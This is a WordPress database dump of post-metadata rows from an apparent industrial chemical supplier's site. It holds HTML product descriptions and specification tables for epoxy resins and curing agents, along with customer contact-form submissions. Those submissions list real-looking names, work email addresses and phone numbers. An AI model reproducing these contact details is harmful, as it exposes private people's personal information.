INSERT INTO `wp_postmeta` VALUES (25160, 2822, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25161, 2822, '_sub_id', '2822'); 
INSERT INTO `wp_postmeta` VALUES (25162, 891, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25163, 891, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25164, 891, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25165, 891, '_yoast_wpseo_focuskw_text_input', 'Modified Liquid Epoxy Resin'); 
INSERT INTO `wp_postmeta` VALUES (25166, 891, '_yoast_wpseo_focuskw', 'EPON 8280'); 
INSERT INTO `wp_postmeta` VALUES (25167, 891, '_yoast_wpseo_metadesc', 'EPON 8280 has been designed for formulating filled compounds for a wide variety of structural applications including bonding, encapsulating, flooring, etc.'); 
INSERT INTO `wp_postmeta` VALUES (25168, 891, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25169, 891, '_yoast_wpseo_focuskeywords', '[{"keyword":"Modified Liquid Epoxy Resin","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (25170, 891, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25171, 891, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25172, 891, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25173, 891, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25174, 891, '_ywtm_content_tab_description', 'EPON 8280 has been designed especially for formulating filled compounds for a wide variety of structural applications, including bonding, electrical encapsulating, tooling, flooring and most construction uses. EPON Resin 8280 is a low molecular weight resin with outstanding resistance to pigment and filler settling, which gives greater stability to filled systems. The resin also has superior resistance to foaming under vacuum and has an adjusted, controlled reactivity with amine curing agents, which serves to extend pot Iife and working life characteristics. In addition, viscosity stability — often a problem in anti-settling resins — presents no problem for EPON Resin 8280. It is as good in viscosity stability as other conventional liquid EPON Resins. Furthermore, it yields products with high physical strength, excellent chemical resistance and good electrical properties. Typical properties for several EPON 8280 amine-cured systems are given below.\r\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Adhesives</li>\r\n 	<li>Electrical encapsulation</li>\r\n 	<li>High solids coatings</li>\r\n 	<li>Vacuum processing</li>\r\n</ul>\r\n</div>\r\n&nbsp;\r\n\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Low foaming</li>\r\n 	<li>High resistance to filler settling</li>\r\n 	<li>Controlled reactivity with amine curing agents</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>Sales Specification</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">185 – 195</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">110 – 150</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1 max.</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Specific gravity @ 20°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/ml</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1.168</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density at 20°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lb/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9.7</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1475</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Refractive index @ 25°C</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">1.570-1.575</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<div class="Section2">\r\n\r\nPro<strong>cessing/How to use</strong>\r\n\r\n<span style="text-decoration: underline;">Low Foaming Tendencies</span>\r\n\r\nEPON Resin 8280 possesses the ability to inhibit foaming during out-gassing in vacuum processing applications. It also has a tendency to reduce bubbles and voids at ambient pressures.\r\n\r\n<span style="text-decoration: underline;">Controlled Reactivity with Amine Curing Agents</span>\r\n\r\nThe reactivity of EPON 8280 is controlled to provide more uniform reactivity between lots and greater ease of handling to the user. The reactivity is similar to undiluted resins,\r\n\r\ne.g., EPON Resin 828.\r\n\r\n<span style="text-decoration: underline;">Resistance to Filler Settling</span>\r\n\r\n</div>\r\n<div class="Section2">\r\n\r\nWhen compared to standard liquid epoxy resins, EPON Resin 8280 exhibits improved resistance to silica filler settling. This is illustrated in Figure 1, which reflects testing of EPON Resin 8280 and two other systems under three different conditions — 3 hours at 95 °C; 10 hours at 95 °C; and 72 hours at 60 °C. All three systems were prepared using finely divided silica. The curves in Figure 1 plot the depth of the settled layer excluding zero settling. The greater the curvature of the line, the softer the settling layer, and therefore, the more easily redispersed.\r\n\r\nIn the 3 hour test, EPON Resin 8280 showed virtually no settling, where the other two systems exhibited a small but hard layer of filler settling. In the 10 hour test, the EPON Resin 8280 system showed a shallow layer of soft settle, while the other two produced deeper and harder layers. In the most severe test, 72 hours, the EPON Resin 8280 system still exhibited a shallow layer of soft settling while the other two systems showed the same or a greater degree of disparity.\r\n\r\nSettling tendency was also tested for seven days at 25 °C (not shown in Figure 1). In this test, EPON Resin 8280 exhibited a negligible amount of soft settling, whereas with other systems tested, about half the filler content had settled in a hard layer.\r\n\r\nMiller-Stephenson is an Epon 8280 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\r\n\r\n</div>'); 
INSERT INTO `wp_postmeta` VALUES (25175, 891, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25176, 924, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25177, 924, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25178, 924, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25179, 924, '_yoast_wpseo_focuskw_text_input', 'EPON 1001F'); 
INSERT INTO `wp_postmeta` VALUES (25180, 924, '_yoast_wpseo_focuskw', 'EPON 1001F'); 
INSERT INTO `wp_postmeta` VALUES (25181, 924, '_yoast_wpseo_metadesc', 'EPON 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and bisphenol-A. Epon Resin 1001F is excellent in pre-impregnation'); 
INSERT INTO `wp_postmeta` VALUES (25182, 924, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25183, 924, '_yoast_wpseo_focuskeywords', '[{"keyword":"Solid Epoxy Resin","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (25184, 924, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25185, 924, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25186, 924, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25187, 924, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25188, 924, '_ywtm_content_tab_description', '<p class="Section1">EPON 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and bisphenol-A. Because of these performance properties, amine and polyamide cured coatings are especially <span class="GramE">useful</span> in maintenance and marine applications.. EPON Resin 1001F is used for its application or end-use advantages in both structural and surface-coating applications as follows:</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Structural applications</strong></span></p>\r\n<p class="Section1">Because of the excellent pre-impregnation properties, EPON 1001F is used in:</p>\r\n<p class="Section1">• Dry lay-up laminates</p>\r\n<p class="Section1">• Dry filament winding</p>\r\n<p class="Section1">• Transfer molding compounds</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Surface coatings</strong></span></p>\r\n<p class="Section1">Amine or polyamide cured coatings based on EPON Resin 1001F provide excellent:</p>\r\n<p class="Section1">• Chemical resistance</p>\r\n<p class="Section1">• Durability</p>\r\n<p class="Section1">• Toughness</p>\r\n<p class="Section1">• Adhesion</p>\r\n<p class="Section1"><strong>Thermosetting acrylic — EPON Resin systems</strong></p>\r\n<p class="Section1">EPON Resin 1001F is used to upgrade thermosetting acrylic resins into coatings with greatly</p>\r\n<p class="Section1"><span class="GramE">improved</span>:</p>\r\n<p class="Section1">• Adhesion</p>\r\n<p class="Section1">• Toughness</p>\r\n<p class="Section1">• Detergent resistance</p>\r\n<p class="Section1">Because of these specific properties, these systems are used extensively for automotive <span class="GramE">and</span> appliance primers. Since solutions of this versatile epoxy resin are the preferred products for most of the aforementioned applications, Miller-Stephenson provides solutions of EPON 1001F in several solvents to assist customers in handling this product.</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Specifications</strong></span></p>\r\n\r\n<div class="Section1">\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">525-550</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">7.0-9.6</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Pt-Co</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">200</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1209</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<p class="Section1"><strong>Typical Properties</strong></p>\r\n\r\n<div class="Section1">\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity, Melt, @ 150 °C</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">600-750</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445-79</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Esterification equivalent weight<sup>1</sup></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">145</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per gallon @ 68 °F</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">10.2</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Flash Point, Setaflash</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">&gt;200 °F</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3278</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Bulk density</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs/ft<sup>3</sup></p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">36-40</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Melting Point</td>\r\n<td valign="top" width="72">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">75-80</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3461</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Hydroxyl content</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">0.29</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Calculated value</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Sodium content</td>\r\n<td valign="top" width="72">\r\n<p align="center">ppm</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">0-2</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">HC-692A</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nMiller-Stephenson is an Epon 1001F Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\r\n\r\n</div>'); 
INSERT INTO `wp_postmeta` VALUES (25189, 924, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25190, 1890, '_wp_attachment_image_alt', 'EPON 825 EPON Resin 825'); 
INSERT INTO `wp_postmeta` VALUES (25191, 842, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25192, 842, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25193, 842, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25194, 842, '_yoast_wpseo_focuskw_text_input', 'EPON Resin 825'); 
INSERT INTO `wp_postmeta` VALUES (25195, 842, '_yoast_wpseo_focuskw', 'EPON 825'); 
INSERT INTO `wp_postmeta` VALUES (25196, 842, '_yoast_wpseo_metadesc', 'EPON 825 is a high purity bisphenol A epichlorohydrin liquid epoxy resin. EPON Resin 825 has excellent chemical and temperature resistance, low conductivity'); 
INSERT INTO `wp_postmeta` VALUES (25197, 842, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25198, 842, '_yoast_wpseo_focuskeywords', '[{"keyword":"EPON Resin 825","score":"good"},{"keyword":"Liquid Epoxy","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (25199, 2825, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25200, 2825, '_seq_num', '92'); 
INSERT INTO `wp_postmeta` VALUES (25201, 2825, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25202, 2825, '_field_12', 'Michael Murphy'); 
INSERT INTO `wp_postmeta` VALUES (25203, 2825, '_field_13', 'Interjet west Airlines'); 
INSERT INTO `wp_postmeta` VALUES (25204, 2825, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25205, 2825, '_field_14', 'tolparts@interjetwest.com'); 
INSERT INTO `wp_postmeta` VALUES (25206, 2825, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25207, 2825, '_field_16', 'I need the sds information for MS-242N'); 
INSERT INTO `wp_postmeta` VALUES (25208, 2825, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25209, 2825, '_sub_id', '2825'); 
INSERT INTO `wp_postmeta` VALUES (25210, 2818, '_edit_lock', '1477937577:2'); 
INSERT INTO `wp_postmeta` VALUES (25211, 2820, '_edit_lock', '1477937642:2'); 
INSERT INTO `wp_postmeta` VALUES (25212, 2821, '_edit_lock', '1477937702:2'); 
INSERT INTO `wp_postmeta` VALUES (25213, 2822, '_edit_lock', '1477937752:2'); 
INSERT INTO `wp_postmeta` VALUES (25214, 2819, '_edit_lock', '1477937806:2'); 
INSERT INTO `wp_postmeta` VALUES (25215, 2825, '_edit_lock', '1478289508:3'); 
INSERT INTO `wp_postmeta` VALUES (25216, 2826, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25217, 2826, '_seq_num', '93'); 
INSERT INTO `wp_postmeta` VALUES (25218, 2826, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25219, 2826, '_field_12', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (25220, 2826, '_field_13', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (25221, 2826, '_field_18', 'asdasd'); 
INSERT INTO `wp_postmeta` VALUES (25222, 2826, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (25223, 2826, '_field_15', '(917) 370-5939'); 
INSERT INTO `wp_postmeta` VALUES (25224, 2826, '_field_16', 'testetestsestsestse'); 
INSERT INTO `wp_postmeta` VALUES (25225, 2826, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25226, 2826, '_sub_id', '2826'); 
INSERT INTO `wp_postmeta` VALUES (25227, 2827, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25228, 2827, '_seq_num', '94'); 
INSERT INTO `wp_postmeta` VALUES (25229, 2827, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25230, 2827, '_field_12', 'Pedro Hernandez'); 
INSERT INTO `wp_postmeta` VALUES (25231, 2827, '_field_13', 'Oceaneering'); 
INSERT INTO `wp_postmeta` VALUES (25232, 2827, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25233, 2827, '_field_14', 'phernandez@oceaneering.com'); 
INSERT INTO `wp_postmeta` VALUES (25234, 2827, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25235, 2827, '_field_16', 'If you could please send me the MSDS on your product.(Precision cleaning agent MS-720,12oz.'); 
INSERT INTO `wp_postmeta` VALUES (25236, 2827, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25237, 2827, '_sub_id', '2827'); 
INSERT INTO `wp_postmeta` VALUES (25238, 2827, '_edit_lock', '1478005100:1'); 
INSERT INTO `wp_postmeta` VALUES (25239, 2829, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25240, 2829, '_seq_num', '95'); 
INSERT INTO `wp_postmeta` VALUES (25241, 2829, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25242, 2829, '_field_12', 'George leon'); 
INSERT INTO `wp_postmeta` VALUES (25243, 2829, '_field_13', 'USAF'); 
INSERT INTO `wp_postmeta` VALUES (25244, 2829, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25245, 2829, '_field_14', 'george.leon.4@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (25246, 2829, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25247, 2829, '_field_16', 'Please provide the SDS for MS-242N Quik-Freeze. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (25248, 2829, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25249, 2829, '_sub_id', '2829'); 
INSERT INTO `wp_postmeta` VALUES (25250, 2831, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25251, 2831, '_seq_num', '83'); 
INSERT INTO `wp_postmeta` VALUES (25252, 2831, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25253, 2831, '_field_1', 'JOHN CRABTREEE'); 
INSERT INTO `wp_postmeta` VALUES (25254, 2831, '_field_10', 'INDUSTRIAL AIR TOOL'); 
INSERT INTO `wp_postmeta` VALUES (25255, 2831, '_field_2', 'john.crabtree@industrialairtool.com'); 
INSERT INTO `wp_postmeta` VALUES (25256, 2831, '_field_8', '(713) 477-3144'); 
INSERT INTO `wp_postmeta` VALUES (25257, 2831, '_field_3', '200each epon pipelok 924 thread locking compound for resale'); 
INSERT INTO `wp_postmeta` VALUES (25258, 2831, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25259, 2831, '_sub_id', '2831'); 
INSERT INTO `wp_postmeta` VALUES (25260, 2832, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25261, 2832, '_seq_num', '84'); 
INSERT INTO `wp_postmeta` VALUES (25262, 2832, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25263, 2832, '_field_1', 'Kirk Switzer'); 
INSERT INTO `wp_postmeta` VALUES (25264, 2832, '_field_10', 'AFM'); 
INSERT INTO `wp_postmeta` VALUES (25265, 2832, '_field_2', 'kirk.switzer@aerospacefab.com'); 
INSERT INTO `wp_postmeta` VALUES (25266, 2832, '_field_8', '(651) 463-8500'); 
INSERT INTO `wp_postmeta` VALUES (25267, 2832, '_field_3', 'Looking for an RFQ for Epon 828/Epikure 3140 filled 50ml cartridge.  Need just 1.  Would like pricing and leadtimes please.  Spec number is 400-4312-150'); 
INSERT INTO `wp_postmeta` VALUES (25268, 2832, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25269, 2832, '_sub_id', '2832'); 
INSERT INTO `wp_postmeta` VALUES (25270, 2833, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25271, 2833, '_seq_num', '85'); 
INSERT INTO `wp_postmeta` VALUES (25272, 2833, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25273, 2833, '_field_1', 'Jack Wilkinson'); 
INSERT INTO `wp_postmeta` VALUES (25274, 2833, '_field_10', 'Mine Safety Appliances'); 
INSERT INTO `wp_postmeta` VALUES (25275, 2833, '_field_2', 'Jack.Wilkinson@MSAsafety.com'); 
INSERT INTO `wp_postmeta` VALUES (25276, 2833, '_field_8', '(724) 776-8841'); 
INSERT INTO `wp_postmeta` VALUES (25277, 2833, '_field_3', 'I will need to order krytox'); 
INSERT INTO `wp_postmeta` VALUES (25278, 2833, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25279, 2833, '_sub_id', '2833'); 
INSERT INTO `wp_postmeta` VALUES (25280, 2834, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25281, 2834, '_seq_num', '96'); 
INSERT INTO `wp_postmeta` VALUES (25282, 2834, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25283, 2834, '_field_12', 'Debbie Bernhardt'); 
INSERT INTO `wp_postmeta` VALUES (25284, 2834, '_field_13', 'Ellsworth Adhesives'); 
INSERT INTO `wp_postmeta` VALUES (25285, 2834, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25286, 2834, '_field_14', 'dbernhardt@ellsworth.com'); 
INSERT INTO `wp_postmeta` VALUES (25287, 2834, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25288, 2834, '_field_16', 'SDS request for MS-122XD.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (25289, 2834, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25290, 2834, '_sub_id', '2834'); 
INSERT INTO `wp_postmeta` VALUES (25291, 2835, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25292, 2835, '_seq_num', '86'); 
INSERT INTO `wp_postmeta` VALUES (25293, 2835, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25294, 2835, '_field_1', 'KIMBERLEY DAUGHERTY'); 
INSERT INTO `wp_postmeta` VALUES (25295, 2835, '_field_10', 'MICROSYSTEMS'); 
INSERT INTO `wp_postmeta` VALUES (25296, 2835, '_field_2', 'KIMBERLEY.DAUGHERTY@KRATOSDEFENSE.COM'); 
INSERT INTO `wp_postmeta` VALUES (25297, 2835, '_field_8', '(850) 244-2332'); 
INSERT INTO `wp_postmeta` VALUES (25298, 2835, '_field_3', 'Good Afternoon,\nI work for a company called Microsystems in Florida, and we are searching for a product that we have been using for years. I am being told it is discontinued, but see you might sell it? The product is Versamid 125. Please give me a call as soon as you can! I appreciate your assistance! My extension is 312'); 
INSERT INTO `wp_postmeta` VALUES (25299, 2835, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25300, 2835, '_sub_id', '2835'); 
INSERT INTO `wp_postmeta` VALUES (25301, 2836, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25302, 2836, '_seq_num', '87'); 
INSERT INTO `wp_postmeta` VALUES (25303, 2836, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25304, 2836, '_field_1', 'Cathy Barnes'); 
INSERT INTO `wp_postmeta` VALUES (25305, 2836, '_field_10', 'L-3 Communications, ETI'); 
INSERT INTO `wp_postmeta` VALUES (25306, 2836, '_field_2', 'cathy.barnes@l-3com.com'); 
INSERT INTO `wp_postmeta` VALUES (25307, 2836, '_field_8', '(310) 517-5121'); 
INSERT INTO `wp_postmeta` VALUES (25308, 2836, '_field_3', 'Do you still make MS 122 N/CO2 release agent?  If so, could you please send me the SDS and TDS?\nThanks,\nCathy Barnes '); 
INSERT INTO `wp_postmeta` VALUES (25309, 2836, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25310, 2836, '_sub_id', '2836'); 
INSERT INTO `wp_postmeta` VALUES (25311, 1059, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25312, 1059, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25313, 1059, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25314, 1059, '_yoast_wpseo_focuskw_text_input', 'Aromatic Amine Curing Agent'); 
INSERT INTO `wp_postmeta` VALUES (25315, 1059, '_yoast_wpseo_focuskw', 'EPIKURE W'); 
INSERT INTO `wp_postmeta` VALUES (25316, 1059, '_yoast_wpseo_metadesc', 'EPIKURE W Curing Agent, is a Non-methylene dianiline, aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding.'); 
INSERT INTO `wp_postmeta` VALUES (25317, 1059, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25318, 1059, '_yoast_wpseo_focuskeywords', '[{"keyword":"Aromatic Amine Curing Agent","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (25319, 1887, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25320, 1059, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25321, 1059, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25322, 1059, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25323, 1059, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25324, 1059, '_ywtm_content_tab_description', 'The EPIKOTE™ Resin 862/EPIKURE™ Curing Agent W system consists of a bisphenol-F epoxy resin and an aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding. EPIKURE Curing Agent W does not contain methylene dianiline (MDA). Low viscosity and very long working life at room temperature\r\nmake this system versatile and easy to process. EPIKURE Curing Agent 537 may be utilized to decrease the gel time of the system with little or no effect on mechanical properties.\r\n\r\n<strong>Composite fabrication- Resin Transfer Molding RTM</strong>\r\n\r\nThe low viscosity feature of the EPIKOTE Resin 862 / EPIKURE W Curing Agent  resin system permits low injection pressures, less fiber washout, high filler/fiber loading, and lower mold\r\ncosts for RTM fabrication processes. An ambient temperature, one-pot, RTM process may be employed in which the mixed resin/curing agent increases from 2200 cP initially to 5000 cP after about 36 hours. Alternatively, a two-pot resin and curing  agent system can be used in which either the resin or both pots may be heated, generally less then 60 °C (140 °F) unless otherwise required. A typical process includes injecting into a heated mold at 121 °C (250 °F). The system viscosity at this temperature is on the order of 10 cP. Following the resin injection, the system should be cured in the mold for between 0.5-1.5 hours at 177 °C (350 °F) followed by a 177 °C (350 °F) post-cure for another hour. Molding and postcure temperatures and times can be modified for optimum production.\r\n\r\n<strong>Composite fabrication — filament winding</strong>\r\n\r\nThe low viscosity and long room temperature 